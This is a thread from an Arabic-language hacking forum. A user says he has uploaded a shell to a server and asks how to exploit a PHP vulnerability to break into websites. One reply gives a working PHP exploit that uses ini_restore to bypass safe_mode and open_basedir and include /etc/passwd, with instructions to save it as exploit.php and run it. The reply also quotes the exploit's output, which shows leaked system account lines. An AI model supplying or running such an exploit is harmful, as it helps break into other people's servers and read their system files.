:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مساعدة (http://www.vbspiders.com/vb/t50968.html)

neo-m 07-08-2011 12:01 AM
مساعدة
 
مرحبا اريد احد يشرحلي هنا استغلال هذه الثغرة

http://securityreason.com/achievement_security*****/42

مع العلم انني نصبت السرفر الشخصي ورفعت عليه الشل والان لدي مواقع مصابة بهذه الثغرة فكيف اخترقها


أرجو المساعدة

neo-m 07-08-2011 01:41 PM
ألا يوجد احد

حارس مملكة الغموض 07-10-2011 12:04 AM
وربى ياصاحبى كنت نفسى اساعدك ولكن ما عرفت

انا اسف صاحبى على تقصيرى اليك

بااااااااااااااااااااى

bleu moon 07-10-2011 12:27 AM
اقتباس:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
php ...

قم بترجمتها ...
اعمل مستند نص جديد وسميه مثلا exploit.php

بعد تشغيل الملف على السيرفر ...

اقتباس:

RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream:
Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for
inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ #
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
- ---


الساعة الآن 08:25 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0